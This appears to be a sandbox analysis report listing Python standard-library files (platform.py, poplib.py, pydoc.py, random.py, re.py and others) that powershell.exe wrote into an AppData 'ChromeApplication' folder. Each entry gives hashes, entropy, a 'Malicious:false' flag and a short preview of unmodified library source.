                                                                                                                                                                                                  SHA1:409FF02B159BF9941F723193FF52E1227B586022
                                                                                                                                                                                                  SHA-256:1C97E98D400D61B3F894A1B014A1E1252EEC2F3D9A8468636A661208E4A7BD05
                                                                                                                                                                                                  SHA-512:26DAAA7577241563D7321623942A04B1C55EAE3610214E9505525D47D5EEF2B20BF267C89ED7CB727293618FF00138ED9A53D166D95AFE2B75DF6D46C921C102
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utilities to support packages."""....from collections import namedtuple..from functools import singledispatch as simplegeneric..import importlib..import importlib.util..import importlib.machinery..import os..import os.path..import sys..from types import ModuleType..import warnings....__all__ = [.. 'get_importer', 'iter_importers', 'get_loader', 'find_loader',.. 'walk_packages', 'iter_modules', 'get_data',.. 'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',.. 'ModuleInfo',..]......ModuleInfo = namedtuple('ModuleInfo', 'module_finder name ispkg')..ModuleInfo.__doc__ = 'A namedtuple with minimal info about a module.'......def _get_spec(finder, name):.. """Return the finder-specific module spec.""".. # Works with legacy finders... try:.. find_spec = finder.find_spec.. except AttributeError:.. loader = finder.find_module(name).. if loader is None:.. return None.. return importlib.util.spec_from_loader(name, loader)..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\platform.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43336
                                                                                                                                                                                                  Entropy (8bit):4.687857736895332
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:9bc2S92P0OLDrXVNZib4xEsA7GkJp+YafLlD/WG3Tu8HDSCsFwldmPNJOw+2/ln6:62BLDrob436p+VfLlDrS8HDSCsFwTSx6
                                                                                                                                                                                                  MD5:F1AB2DC8B6A1B56DF2BA8F98224D0701
                                                                                                                                                                                                  SHA1:E9E8C632C64D7E5C0083A05F3BE70ECC5FA6B39D
                                                                                                                                                                                                  SHA-256:275B3D17D1F5EF4A0A7D3FCC7D5DBF72422A72CE234EB7C8A9D0D9975F6F70C3
                                                                                                                                                                                                  SHA-512:12F82340F2584DFE296D7312CA3228530087CD16AE8FB5F6AB2C75BBAAAD6A56D1629A81981C41A0D33EF7870CAB5AEE752A2E415270E6F7147DCF9E64366E48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#!/usr/bin/env python3....""" This module tries to retrieve as much platform-identifying data as.. possible. It makes this information available via function APIs..... If called from the command line, it prints the platform.. information concatenated as single string to stdout. The output.. format is useable as part of a filename....."""..# This module is maintained by Marc-Andre Lemburg <mal@egenix.com>...# If you find problems, please submit bug reports/patches via the..# Python bug tracker (http://bugs.python.org) and assign them to "lemburg"...#..# Still needed:..# * support for MS-DOS (PythonDX ?)..# * support for Amiga and other still unsupported platforms running Python..# * support for additional Linux distributions..#..# Many thanks to all those who helped adding platform-specific..# checks (in no particular order):..#..# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,..# Jeff Bauer, Cliff Crawford, Ivan Van Lanin

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\plistlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29263
                                                                                                                                                                                                  Entropy (8bit):4.616853679109559
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:K4FnSsaOu3ywDNAotyQVGdYjzAX1i5vi2R2dLpv68LuSYGXlzBp1yD:bFnSsk3yw9//jzAX1i5vi2R27v68LuSi
                                                                                                                                                                                                  MD5:DA68DE2038480FDFFA9BA88E0CD878F1
                                                                                                                                                                                                  SHA1:A8182D084E4794564AFE39D6B9D532D28FF20545
                                                                                                                                                                                                  SHA-256:934074D9CEABEC70207EDE26C9CEF10A7FFBA720CC9B1A4F40134DF4B702FD51
                                                                                                                                                                                                  SHA-512:29F739DF8F5AF4865134458535ED26EBA9BEA10B944C3BB62ED5EF4900A632B385FB6A685898B9A2470E48AF468379C4A4DA5B554952A462E8F277F71015FA16
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""plistlib.py -- a tool to generate and parse MacOSX .plist files.....The property list (.plist) file format is a simple XML pickle supporting..basic object types, like dictionaries, lists, numbers and strings...Usually the top level object is a dictionary.....To write out a plist file, use the dump(value, file)..function. 'value' is the top level object, 'file' is..a (writable) file object.....To parse a plist from a file, use the load(file) function,..with a (readable) file object as the only argument. It..returns the top level object (again, usually a dictionary).....To work with plist data in bytes objects, you can use loads()..and dumps().....Values can be strings, integers, floats, booleans, tuples, lists,..dictionaries (but only with string keys), Data, bytes, bytearray, or..datetime.datetime objects.....Generate Plist example:.... import datetime.. import plistlib.... pl = dict(.. aString = "Doodah",.. aList = ["A", "B", 12, 32.1, [1, 2, 3]],.. a

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\poplib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15681
                                                                                                                                                                                                  Entropy (8bit):4.545608549924057
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:399df9uylT1ZUhRFeOS0DVipTnzr4ZCi2w:N9dUylTma0DVipDzUZCi2w
                                                                                                                                                                                                  MD5:8827240702694AD5C2A064103157245C
                                                                                                                                                                                                  SHA1:8596D00B1574A06C705A00503DCE496F1E905953
                                                                                                                                                                                                  SHA-256:FCA47328C848D2517B797C303910F363CD118D4A57EAFC699EA9BD07E3555DA9
                                                                                                                                                                                                  SHA-512:3A9C6E5911C26A9960F1676E449FC267AF9CFD5746B092804CFE43A11B1F68AD624B5AB72A559E759B2F10869D111DB8E58E567E43D0B5CA6B361826DFA475F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A POP3 client class.....Based on the J. Myers POP3 draft, Jan. 96.."""....# Author: David Ascher <david_ascher@brown.edu>..# [heavily stealing from nntplib.py]..# Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97]..# String method conversion and test jig improvements by ESR, February 2001...# Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003....# Example (see the test function at the end of this file)....# Imports....import errno..import re..import socket..import sys....try:.. import ssl.. HAVE_SSL = True..except ImportError:.. HAVE_SSL = False....__all__ = ["POP3","error_proto"]....# Exception raised when an error or invalid response is received:....class error_proto(Exception): pass....# Standard Port..POP3_PORT = 110....# POP SSL PORT..POP3_SSL_PORT = 995....# Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF)..CR = b'\r'..LF = b'\n'..CRLF = CR+LF....# maximal line length when callin

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\posixpath.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16792
                                                                                                                                                                                                  Entropy (8bit):4.523436713727538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:o1EBBFYOHeIlLGN2lzfQzfauq63pvTLhDNqbZLtHcpYtD:o1EBB3Lcauq6aZLGp0
                                                                                                                                                                                                  MD5:83225ED90D2BCA83319A2A828EEDFD03
                                                                                                                                                                                                  SHA1:E8C0C715FEE809981D7FDC1F204580422A27F610
                                                                                                                                                                                                  SHA-256:089CA943FE970634B2D9171E19E34CABF2CF7A43D23BD8738A89F334BBD971D4
                                                                                                                                                                                                  SHA-512:C8115208CC9E858816BFAF940C3728A2020A7E5794371E73596DF1A90B1A668A037BA2B5419A96685B375B0390E94C989E860F53D54F2556BE7F7369976D658F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Common operations on Posix pathnames.....Instead of importing this module directly, import os and refer to..this module as os.path. The "os.path" name is an alias for this..module on Posix systems; on other systems (e.g. Windows),..os.path provides the same operations in a manner specific to that..platform, and is an alias to another module (e.g. ntpath).....Some of this can actually be useful on non-Posix systems too, e.g...for manipulation of the pathname component of URLs..."""....# Strings representing various path-related bits and pieces...# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '/'..pathsep = ':'..defpath = '/bin:/usr/bin'..altsep = None..devnull = '/dev/null'....import os..import sys..import stat..import genericpath..from genericpath import *....__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pprint.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25114
                                                                                                                                                                                                  Entropy (8bit):4.322203919874031
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0zJwB8YxVSFKCbM7mDO9dcqaDmQnfxRW9VguPxWLgB:0zJwKY7CbVDgiTWVxW4
                                                                                                                                                                                                  MD5:2DC4035AC114107D8B13E39958938960
                                                                                                                                                                                                  SHA1:EF2565CAFCAD5FF6E795748DD913DA4A5ABD482D
                                                                                                                                                                                                  SHA-256:0905D7CD070A291A506B1B2CC46DADC85007C2739D9BF2F1DCDE01A9C1679821
                                                                                                                                                                                                  SHA-512:53554A133380028FBD70613E52172DDCBA74CED0F02ADB974C49149EAC574198309595C8FCE10763316ED0CCD1D35C1672D9EDBBC3D42F518B9B782CCBD12B8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Author: Fred L. Drake, Jr...# fdrake@acm.org..#..# This is a simple little module I wrote to make life easier. I didn't..# see anything quite like it in the library, though I may have overlooked..# something. I wrote this when I was trying to read some heavily nested..# tuples with fairly non-descriptive content. This is modeled very much..# after Lisp/Scheme - style pretty-printing of lists. If you find it..# useful, thank small children who sleep at night....."""Support to pretty-print lists, tuples, & dictionaries recursively.....Very simple, but useful, especially in debugging data structures.....Classes..-------....PrettyPrinter().. Handle pretty-printing operations onto a stream using a configured.. set of formatting parameters.....Functions..---------....pformat().. Format a Python object into a pretty-printed representation.....pprint().. Pretty-print a Python object to a stream [default is sys.stdout].....saferepr().. Generate a '

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\profile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23481
                                                                                                                                                                                                  Entropy (8bit):4.4456903061634785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eQG31DiWobPzKZNVKtSG/6stsZhCs7SJ4ATp9FJ8sxCCxZhlklCB7xz7N2:ej1DizbGZNZG/ics7YTp9FJ8sxCCRel3
                                                                                                                                                                                                  MD5:5B9AA68D3E57EAEA89D8183F2A0C543D
                                                                                                                                                                                                  SHA1:84422184D267F877C5266E5A62901F60828AEB4E
                                                                                                                                                                                                  SHA-256:3307B50C8E87ED3508340B455C371BFA6B148898D66FF8F0AD3D47EBF27E869E
                                                                                                                                                                                                  SHA-512:9187A6A20064E29BDE5292BDC5BCD20B62DF7EAE949D8CD4A8B79E2E169D9FA5559C89187CFE6B308FB990F30BF1B06BA01B3D75F71A152DBC79E414E73B4297
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3..#..# Class for profiling python code. rev 1.0 6/2/94..#..# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum...."""Class for profiling Python code."""....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import time..import marshal....__all__ = ["run", "runctx"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pstats.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30105
                                                                                                                                                                                                  Entropy (8bit):4.33706442701786
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:oQG3E09NURDhs71UDrLgxAELHsvKSGdRo0t1O9dKPSJ0HXA6Erqr9roMBXLvZr8m:ojN9mhsLxAkduKPSOC0h
                                                                                                                                                                                                  MD5:A709BCFBB2850262429D9FABBE67ABC7
                                                                                                                                                                                                  SHA1:F02F963B567628F83D2AC5AC4246356140A85AE0
                                                                                                                                                                                                  SHA-256:E1512CB76993E2113B3086CC61D1683ED9CE366C350D39D21A6BCBD222D8C660
                                                                                                                                                                                                  SHA-512:734B996B4844A476187EF4D5F7C9534CDC79E8F12AD03E419C0CBF873F71D85DA85B3180B4636D2451A70FA11817A7D344CDB29FBCBE8EE89966E9BBA8A74E60
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Class for printing reports on profiled python code."""....# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import os..import time..import marshal..import re....from enum import Enum..from functools import cmp_to_key..from datacl

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pty.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5400
                                                                                                                                                                                                  Entropy (8bit):4.632984387456067
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:eE/i140+nvF19uaLUHzQRXwiX/H80Ni6BONKI1km8jKTlTZw+PTX+v5/fYvOn:eGV0+vZTLwQRXPPHriHhEu9Zw+PbM5/J
                                                                                                                                                                                                  MD5:76D45ABE784519B8C8552EF253C46F85
                                                                                                                                                                                                  SHA1:871A4ECAE472F27509ED8008F0438E942908C3DC
                                                                                                                                                                                                  SHA-256:32F429813D305FA49201E761F11AFAA9D9AED79016F4980C2F01CC90AB8BA48B
                                                                                                                                                                                                  SHA-512:DC594987EB61BFA87564637C661B361679A84B8042C6B54F2BFE04D9EDFF5F138E509D93D4C517FAD2192D154BFEB9210B1B61704F4F2B582CEA35FC279C4A35
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Pseudo terminal utilities."""....# Bugs: No signal handling. Doesn't set slave termios and window size...# Only tested on Linux, FreeBSD, and macOS...# See: W. Richard Stevens. 1992. Advanced Programming in the..# UNIX Environment. Chapter 19...# Author: Steen Lumholt -- with additions by Guido.....from select import select..import os..import sys..import tty....# names imported directly for test mocking purposes..from os import close, waitpid..from tty import setraw, tcgetattr, tcsetattr....__all__ = ["openpty", "fork", "spawn"]....STDIN_FILENO = 0..STDOUT_FILENO = 1..STDERR_FILENO = 2....CHILD = 0....def openpty():.. """openpty() -> (master_fd, slave_fd).. Open a pty master/slave pair, using os.openpty() if possible.""".... try:.. return os.openpty().. except (AttributeError, OSError):.. pass.. master_fd, slave_name = _open_terminal().. slave_fd = slave_open(slave_name).. return master_fd, slave_fd....def master_open():.. """mas

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\py_compile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8049
                                                                                                                                                                                                  Entropy (8bit):4.51326914454816
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:mhnIB1tuDZ6ryJ0Dl8kr+5MboQE/Hcw1Zatu4dkKk6Dg7D3USWJ3DirI2dVDHsky:mnI5uB580/Z8UIg8Sm+rI2PDHsky
                                                                                                                                                                                                  MD5:686E650CC5186DF740BB778A11376241
                                                                                                                                                                                                  SHA1:32D7D66CAFDE71C7F16A33E52AB7CE093912B04F
                                                                                                                                                                                                  SHA-256:BA4E5D1AC94FEC03BB7EDE8E1B7E4D56C8F165D9B3CDD130E16902D13489FCC4
                                                                                                                                                                                                  SHA-512:F8E444ADB2359CFD7BA3B14B9388AF4023FB71AEF211FAB82373C0FDD24E9F2ABB065489A7F2AE693852AC189F3B3163620200FC968F071092596900ABB901F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Routine to "compile" a .py file to a .pyc file.....This module has intimate knowledge of the format of .pyc files..."""....import enum..import importlib._bootstrap_external..import importlib.machinery..import importlib.util..import os..import os.path..import sys..import traceback....__all__ = ["compile", "main", "PyCompileError", "PycInvalidationMode"]......class PyCompileError(Exception):.. """Exception raised when an error occurs while attempting to.. compile the file..... To raise this exception, use.... raise PyCompileError(exc_type,exc_value,file[,msg]).... where.... exc_type: exception type to be used in error message.. type name can be accesses as class variable.. 'exc_type_name'.... exc_value: exception value to be used in error message.. can be accesses as class variable 'exc_value'.... file: name of file being compiled to be used in error message.. c

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pyclbr.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11710
                                                                                                                                                                                                  Entropy (8bit):4.504337884600187
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BzHcJfRYL1hkj7CXEpriGyN1R73rM9R5BWq/3wSg9bberhTtsahL:Bz8JRYLXE3ab77MD5wq/34buhxsaR
                                                                                                                                                                                                  MD5:67EDE4D94842456FA89ABA6B55AA448C
                                                                                                                                                                                                  SHA1:ED3E010535D4418EE95C61F65674F5B3FEBDDFE1
                                                                                                                                                                                                  SHA-256:E87683A58D47E7E7C49BD1BB83BEC01BC8EDF803DEFF289AC30C2C5FCC8DA979
                                                                                                                                                                                                  SHA-512:7D500CC706E1D2936B22894979881AE3A7BC40949A085780F684C64441227ECCFBC6DB5B6711CF82E169169761B291AB0458E46E7835C8D41947B2CA002853B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Parse a Python module and describe its classes and functions.....Parse enough of a Python file to recognize imports and class and..function definitions, and to find out the superclasses of a class.....The interface consists of a single function:.. readmodule_ex(module, path=None)..where module is the name of a Python module, and path is an optional..list of directories where the module is to be searched. If present,..path is prepended to the system search path sys.path. The return value..is a dictionary. The keys of the dictionary are the names of the..classes and functions defined in the module (including classes that are..defined via the from XXX import YYY construct). The values are..instances of classes Class and Function. One special key/value pair is..present for packages: the key '__path__' has a list as its value which..contains the package search path.....Classes and Functions have a common superclass: _Object. Every instance..has the following attributes:.. mod

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\pydoc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):112431
                                                                                                                                                                                                  Entropy (8bit):4.588435548990698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:dsw0YAnUM+dsvmxD3bDhaC7p09Nsrnz0loD/im9OTB3P:ds8AcdsGDP8jvAzRD/nON3P
                                                                                                                                                                                                  MD5:66C9AF70881505FD7E9B83465C102F03
                                                                                                                                                                                                  SHA1:B5F055339170C7755BE08763AD9E5D5A543DDF29
                                                                                                                                                                                                  SHA-256:F4D1143A78C6B993BE749C773D0E83313A2F6E118E1CC676C1CA4EFA15CFD7B9
                                                                                                                                                                                                  SHA-512:3581CD47E0E9AA713A2F151EFBDFC2CCFA7F80609A5E25A42CD6D01A641CA1AC4666F548F2197E827FA46983D1FEFDE87E55126690BAA04296991A64EB64930F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#!/usr/bin/env python3.."""Generate Python documentation in HTML or text for interactive use.....At the Python interactive prompt, calling help(thing) on a Python object..documents the object, and calling help() starts up an interactive..help session.....Or, at the shell command line outside of Python:....Run "pydoc <name>" to show documentation on something. <name> may be..the name of a function, module, package, or a dotted reference to a..class or function within a module or module in a package. If the..argument contains a path segment delimiter (e.g. slash on Unix,..backslash on Windows) it is treated as the path to a Python source file.....Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines..of all available modules.....Run "pydoc -n <hostname>" to start an HTTP server with the given..hostname (default: localhost) on the local machine.....Run "pydoc -p <port>" to start an HTTP server on the given port on the..local machine. Port number 0 can be used to get an

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\queue.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11822
                                                                                                                                                                                                  Entropy (8bit):4.376403701654197
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:8yWZYD0IZsvHoH13DwaZbr1r+OO4HHHhBxwrA17IVhHohkwoa0vui8uftYi6zRSh:8ffIZTlZfphhVaazoBVYJeDQazkRQ
                                                                                                                                                                                                  MD5:F777EB2684C7FFA466D1546E1972F8F1
                                                                                                                                                                                                  SHA1:A2E1B0ADBE02008139E1DAFABFD14E3D33E5539A
                                                                                                                                                                                                  SHA-256:3160B770DC5CBDF0A5F9297DD8EA7FB77ACD99B36AF8088C8015B119D2E5069F
                                                                                                                                                                                                  SHA-512:7BDEC8B19CDA7A6682A93719AB551A3EA7DB157685EFD208F56B51049A177E7A0D69235AA954F755D881DC4BD8670D4CB120949EFEEE86148CFB5544A4D487EE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:'''A multi-producer, multi-consumer queue.'''....import threading..import types..from collections import deque..from heapq import heappush, heappop..from time import monotonic as time..try:.. from _queue import SimpleQueue..except ImportError:.. SimpleQueue = None....__all__ = ['Empty', 'Full', 'Queue', 'PriorityQueue', 'LifoQueue', 'SimpleQueue']......try:.. from _queue import Empty..except ImportError:.. class Empty(Exception):.. 'Exception raised by Queue.get(block=0)/get_nowait().'.. pass....class Full(Exception):.. 'Exception raised by Queue.put(block=0)/put_nowait().'.. pass......class Queue:.. '''Create a queue object with a given maximum size..... If maxsize is <= 0, the queue size is infinite... '''.... def __init__(self, maxsize=0):.. self.maxsize = maxsize.. self._init(maxsize).... # mutex must be held whenever the queue is mutating. All methods.. # that acquire mutex must release it before returning.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\quopri.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7510
                                                                                                                                                                                                  Entropy (8bit):4.528644805401654
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nP6LcGY5uUuWgCSqkc97dlDsYJuLz9/x/1d0:CjUuokcddl5oM
                                                                                                                                                                                                  MD5:3B06A77D6A302CB952C0A488387F1624
                                                                                                                                                                                                  SHA1:2C60F0345E160E7A793091EE6021E5A5760A3523
                                                                                                                                                                                                  SHA-256:72312E4C1815E29A236D62871D313A9A2393A424A3E04AC3A1393A09C032D22D
                                                                                                                                                                                                  SHA-512:4891E6FC7C6C29DFFDC632835B4272012B61A0A703852C64A80AACA35FB083747C650CA0D24C70283AE53DB975A7F58D0132D3869827C4EAC79F51653E8BACF1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Conversions to/from quoted-printable transport encoding as per RFC 1521."""....# (Dec 1991 version).....__all__ = ["encode", "decode", "encodestring", "decodestring"]....ESCAPE = b'='..MAXLINESIZE = 76..HEX = b'0123456789ABCDEF'..EMPTYSTRING = b''....try:.. from binascii import a2b_qp, b2a_qp..except ImportError:.. a2b_qp = None.. b2a_qp = None......def needsquoting(c, quotetabs, header):.. """Decide whether a particular byte ordinal needs to be quoted..... The 'quotetabs' flag indicates whether embedded tabs and spaces should be.. quoted. Note that line-ending tabs and spaces are always encoded, as per.. RFC 1521... """.. assert isinstance(c, bytes).. if c in b' \t':.. return quotetabs.. # if header, we have to escape _ because _ is used to escape space.. if c == b'_':.. return header.. return c == ESCAPE or not (b' ' <= c <= b'~')....def quote(c):.. """Quote a single character.""".. assert isins

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\random.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34151
                                                                                                                                                                                                  Entropy (8bit):4.491133205294742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:C3reJ1jUijTWhhG3AF+ziPmfHbWW+DN5ayEW:ViG3y+zSmz8x
                                                                                                                                                                                                  MD5:D9F1783FF1C70E418F49EB5862894B8C
                                                                                                                                                                                                  SHA1:0F5A7AA6B90253596839C64E504A8C445F3265A0
                                                                                                                                                                                                  SHA-256:E2F9C9E08EE7A922D6AE50FED25CB4EFCF833B86D857D846A2BB6C55600D3C25
                                                                                                                                                                                                  SHA-512:CABCE9F6CE02F7CD1AE63840E208C16AFAEF9BB66261F8D8F1533F116F029247199BF4F5FF80545681A2DA8182C7AB3AD8CA98CD03416622962EB59726B8B6BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Random variable generators..... bytes.. -----.. uniform bytes (values between 0 and 255).... integers.. --------.. uniform within range.... sequences.. ---------.. pick random element.. pick random sample.. pick weighted random sample.. generate random permutation.... distributions on the real line:.. ------------------------------.. uniform.. triangular.. normal (Gaussian).. lognormal.. negative exponential.. gamma.. beta.. pareto.. Weibull.... distributions on the circle (angles 0 to 2pi).. ---------------------------------------------.. circular uniform.. von Mises....General notes on the underlying Mersenne Twister core generator:....* The period is 2**19937-1...* It is one of the most extensively tested generators in existence...* The random() method is implemented in C, executes i

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\re.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16243
                                                                                                                                                                                                  Entropy (8bit):4.697959708532748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6bda8nr7PRL1AoscB8kRD/y/0cy/9O1+1Q0:6pa8nrrRpAoscBBRD6/y/9O1+1X
                                                                                                                                                                                                  MD5:F04D4A880157A5A39BBAFC0073B8B222
                                                                                                                                                                                                  SHA1:92515B53EE029B88B517C1F2F26F6D022561F9B4
                                                                                                                                                                                                  SHA-256:5AE8929F8C0FB9A0F31520D0A909E5637D86C6DEBB7C0B8CBACC710C721F9F7D
                                                                                                                                                                                                  SHA-512:556AAACFC4237B8AB611922E2052407A6BE98A7FB6E36E8D3ED14412B22E50ABAC617477F53ACFA99DBA1824B379C86376991739D68749EB5F162E020E7999CB
                                                                                                                                                                                                  Malicious:false
